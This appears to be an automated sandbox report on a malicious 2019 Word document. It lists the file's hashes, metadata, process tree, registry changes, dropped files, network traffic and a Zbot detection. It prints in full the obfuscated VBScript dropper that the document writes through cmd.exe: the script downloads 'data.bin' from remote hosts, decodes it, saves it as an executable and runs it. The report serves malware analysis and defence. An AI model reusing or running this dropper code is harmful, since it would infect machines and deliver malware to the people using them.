File name: | a55f7463e14155f62adba7b61917ba7d.doc |
Full analysis: | https://app.any.run/tasks/f0f1578a-59ab-4518-a271-1ff77a70e145 |
Verdict: | Malicious activity |
Analysis date: | April 23, 2019, 07:58:31 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: nonmonarchistic , Template: Normal.dotm, Last Saved By: adherescence , Revision Number: 4, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jun 3 22:27:00 2016, Last Saved Time/Date: Sun Aug 7 00:34:00 2016, Number of Pages: 1, Number of Words: 3251, Number of Characters: 18532, Security: 0 |
MD5: | A55F7463E14155F62ADBA7B61917BA7D |
SHA1: | 3E56FD1C41C3EB39235E8D697CF4F1934A4622A3 |
SHA256: | 3DD06F48B6505BB705BC0834C9F34CDEF80E778417F6BEC8850776F32334AD5D |
SSDEEP: | 1536:/wv2JTL76hKmy5Xyfvau1V8LHZiiy3SyZmfpbkZobObdBBdm+IGwAJuDTKtrCEWE:/JTLOcmy5Xya+g5iz3HmQoGwAJXdbIC |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: | |
TitleOfParts: | |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 14 |
CharCountWithSpaces: | 21740 |
Paragraphs: | 43 |
Lines: | 154 |
Company: | glutael |
CodePage: | Windows Cyrillic |
Security: | None |
Characters: | 18532 |
Words: | 3251 |
Pages: | 1 |
ModifyDate: | 2016:08:06 23:34:00 |
CreateDate: | 2016:06:03 21:27:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 4 |
LastModifiedBy: | adherescence |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | nonmonarchistic |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2808 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\a55f7463e14155f62adba7b61917ba7d.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3668 | "C:\Windows\System32\cmd.exe" /V /C set "JlD=C:\Users\admin\AppData\Roaming\%RANDOM%.vbs" && (for %i in ("dIm C1HAUo" "SUb LR()" "FR=96" "CX3=""""" "Lp9c2=6" "PQQxQnb=C1HAUo & WEUk1W & DfS5vBG("630F091F","VMaN")" "YtHZ=3" "SQx2=DfS5vBG("575D3479304C557078161463041607601072757516","U40PW")" "B1=63" "EnAQ C1HAUo & DfS5vBG("6A7C0B13","ND2"),PQQxQnb" "Ff3ry=96" "iF NuYelnW="" THEn AFOtXLB((-451+455))" "I9M9=48" "KZJ6="LXKrwN"" "FdDAiUp=21" "sET Iha=cREAteObjEcT(DfS5vBG("0F181105273C2C65211F2B2034",KZJ6))" "OxJ=98" "Iha.RuN SQx2 & PQQxQnb & CX3,1729-1729,2183-2183" "QeB0=84" "eNd SUb" "functIoN Fney(M9T,XcuUXPQ)" "Aez=54" "Fney=(M9T aND Not XcuUXPQ)oR(NoT M9T aND XcuUXPQ)" "B5Yr=28" "enD FUnCtioN" "SUb MzY()" "EVc2=27" "YUqklR=94643265" "Dfi=68" "FoR Pg6n=1 tO YUqklR" "DkT3=DkT3+1" "neXt" "ELPI4=7" "If DkT3=YUqklR TheN" "YwDx9nw=40" "AFOtXLB((-2594+2598))" "G1R=63" "YaNI(DfS5vBG("2B47310755616C4324030E3E2F5C3011412D2C5E6A130E3A221D271E01","NC3Ewo"))" "R0Z3=25" "EnD iF" "VokkUN4=41" "ENd sUB" "FUnCtIon BRqXDc(A3)" "ClU8yZ=32" "BRqXDc=asC(A3)" "Ljzj5l=31" "eND FUncTIOn" "sUB YgEx()" "Q0=60" "Dim Lb7, FPUfcMW" "For Lb7 = 39 To 9000257" "FPUfcMW = JF1 + 37 + 98 + 89" "Next" "A5=93" "eNd SUb" "GPnCwjS=47" "MzY" "fuNCtIOn YaNI(AxeTEV)" "I3X=58" "diM JJ,CYkj" "Ez4mF=66" "SelpK0t="IhNAgA"" "RqcjoH=24" "On ERrOR ReSUME nExT" "V6oI=24" "ILIMb4="TsEdh"" "DzI=32" "sEt JJ=crEaTEoBjecT(DfS5vBG("2416071A3D03314A3B3C162908",ILIMb4))" "FHel=86" "KN="QJHa"" "YgEx" "DR=28" "Set LwmclJ=JJ.ENVIRoNMeNT(DfS5vBG("18023621021B03","GHPyb"))" "T5=60" "C1HAUo=LwmclJ(DfS5vBG("033D15062C1103","EBm"))&OZidzz((552920/6010))& WEUk1W & WEUk1W" "Bf7=48" "Yq9="F1"" "DXXqVR=18" "SEt CYkj=CREATeObjECT(DfS5vBG("7C2F52345E355E204568690B7D0E651261",Yq9))" "QOPuD=40" "CYkj.oPen DfS5vBG("027C00","TE9"),AxeTEV,5277-5277" "Q8fc=49" "CYkj.SENd()" "C54EY=95" "if CYkj.STATUs=(-8506+8706) then" "XzJ=32" "YgEx" "NF41Io6=59" "AFOtXLB((-1988+1992))" "KHWB=9" "FDIm CYkj.rEsPOnSEbODy" "KXGTN=26" "Else" "DKnSxxa=44" 
"W8="T8"" "BH=64" "sEt CYkj= crEaTEObJEcT(DfS5vBG("753D5B26572757324C7A6019741C6C0068",W8))" "Au3=63" "CYkj.OPEn DfS5vBG("712306","R6f"),DfS5vBG("06381B34546340765E7B41715962576A5C795E6B0A2D1B25402E062A","DnLo" ),2128-2128" "O4=20" "CYkj.senD()" "JF0co7f=40" "If CYkj.sTaTus=(668-468)TheN FDIm CYkj.ReSpONSeboDY" "SxTSpu=13" "B9OjwIG=74" "end if" "ORs=16" "ENd fUnCtION" "sUb FDIm(Cs)" "D9A=82" "diM Nkf1X" "Frhm=75" "C0U="YAwTF"" "VI=25" "sEt Nkf1X=CREAteOBJecT(DfS5vBG("00331B021B6F2420343C201A",C0U))" "YYcs=70" "Nkf1X.Open" "U2h2y=55" "Nkf1X.tYpE=953-952" "NA36=73" "Nkf1X.wRite Cs" "N0=70" "Nkf1X.saVeTofILe C1HAUo & DfS5vBG("632B283D","YMemj"),4439-4437" "TYiru2q=48" "Nkf1X.cLoSe" "PgC5ZRi=27" "LR" "OO=80" "eND SUb" "fuNCTIOn EnAQ(TkLu,DZbQgMr)" "SI=78" "dIm LAV45c,NM33XTg,IZm1YO,EfBP7q,FxlO(5)" "GtUmt0=79" "FxlO(2)=107" "DvCJ=93" "FxlO(3)=50" "SVkuoz2DR=98" "FxlO(0)=104" "Va2=93" "FxlO(1)=100" "B3FU=66" "FxlO(5)=52" "N4DKIeE=57" "FxlO(4)=54" "BQ5Eb=65" "Ok9b=61" "sET LAV45c=CreatEobjEcT(DfS5vBG("030113502035390C061716283C0732402335350F2E5B3A243316", "APba9P"))" "BF=63" "sEt NM33XTg=LAV45c.gEtfile(TkLu)" "CjkfxC=54" "Set EfBP7q=NM33XTg.OPENaStexTstreAm(4220-4219,5542-5542)" "BRAhEmL=34" "seT IZm1YO=LAV45c.cREateTEXTFIlE(DZbQgMr,482-481,1204-1204)" "GLD3=67" "dO UntiL EfBP7q.AteNdoFsTream" "IZm1YO.Write OZidzz(Fney(BRqXDc(EfBP7q.REAd(6397-6396)),FxlO(0)))" "looP" "RKL=55" "IZm1YO.cLOse" "ELgysl=72" "EfBP7q.cLOSE" "TaRQ=77" "enD fuNcTioN" "FUnCTiOn DfS5vBG(LF,Yk)" "QGEtQ=17" "dIM ErBOPn,DPjnS,NCnVL" "DlLdc=91" "FoR ErBOPn=1 To (LeN(LF)/2)" "DPjnS=(OZidzz((4269-4231)) & OZidzz((3235-3163))&(Mid(LF,(ErBOPn+ErBOPn)-1,2)))" "NCnVL=(BRqXDc(MId(Yk,((ErBOPn MOd lEN(Yk))+1),1)))" "DfS5vBG=DfS5vBG+OZidzz(Fney(DPjnS,NCnVL))" "neXt" "WuN=90" "EnD FuNCTiOn" "fuNctIon OZidzz(JbKBPb)" "UOYiHcw=54" "OZidzz=cHr(JbKBPb)" "PQP33CP=83" "ENd fuNctiON" "sUb AFOtXLB(GXC07)" "XkVatL5=15" "dIm N0PJ0b" "Y66X=22" "N0PJ0b=tiMeR+GXC07" "dO wHILe TiMer<N0PJ0b" "loOp" "XklNGL5=78" "eNd Sub" 
"fUNctIon WEUk1W()" "RI4dStW=19" "WEUk1W=SeCoNd(Time)" "KbIK=12" "EnD fuNctIon" "SUb Y6()" "EtE4E=76" "DIm DF0J7FC,LrvyWVb" "XEyK=80" "Do whiLe DF0J7FC<>283-282" "LrvyWVb=LrvyWVb+1" "looP" "EvkdKrO=87" "eNd SuB") do @echo %~i)>"!JlD!" && start "" "!JlD!" | C:\Windows\System32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2972 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Roaming\26535.vbs" | C:\Windows\System32\WScript.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Version: 5.8.7600.16385 |
(PID) Process: | (2808) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | yx= |
Value: 79783D00F80A0000010000000000000000000000 | |||
(PID) Process: | (2808) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (2808) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: On | |||
(PID) Process: | (2808) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | WORDFiles |
Value: 1318518814 | |||
(PID) Process: | (2808) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1318518936 | |||
(PID) Process: | (2808) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1318518937 | |||
(PID) Process: | (2808) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
Operation: | write | Name: | MTTT |
Value: F80A0000A8386161AAF9D40100000000 | |||
(PID) Process: | (2808) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | cy= |
Value: 63793D00F80A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (2808) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | delete value | Name: | cy= |
Value: 63793D00F80A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (2808) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRFC79.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2972 | WScript.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@pataplouf[1].txt | — | |
MD5:— | SHA256:— | |||
3668 | cmd.exe | C:\Users\admin\AppData\Roaming\26535.vbs | text | |
MD5:00211A9E8BCF7304A64E47754DBFE1AA | SHA256:D650924F34778AD6195A986F5082822848630D166EEE6B6963E326984F6F2D59 | |||
2972 | WScript.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@pataplouf[2].txt | text | |
MD5:32990E7F81F7AADCDA0A5BE5438A4E20 | SHA256:73700D1D02FD969F0E019D4016663B63A92C7F4E4B60952D357A1FC0B68F3B8F | |||
2808 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:D51C39B4563387032CF4AD31ABBB804B | SHA256:8457B9288580533F5060CCDE479080E768ED8FC6C36263F6B10452EB894690E2 | |||
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$5f7463e14155f62adba7b61917ba7d.doc | pgc | |
MD5:4F4DC7AE3F57772C55329D824B56BA9C | SHA256:17613C421276BA3779D2EFAD6E8FBE110EC59D79C9C16BD23FF7D01BEB4B09BD |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2972 | WScript.exe | GET | — | 207.57.8.251:80 | http://207.57.8.251/data.bin | US | — | — | suspicious |
2972 | WScript.exe | GET | 404 | 213.186.33.168:80 | http://pataplouf.com/data.bin | FR | html | 206 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2972 | WScript.exe | 213.186.33.168:80 | pataplouf.com | OVH SAS | FR | suspicious |
2972 | WScript.exe | 207.57.8.251:80 | — | NTT America, Inc. | US | suspicious |
Domain | IP | Reputation |
---|---|---|
pataplouf.com | | malicious |
PID | Process | Class | Message |
---|---|---|---|
2972 | WScript.exe | A Network Trojan was detected | ET CURRENT_EVENTS Zbot Generic URI/Header Struct .bin |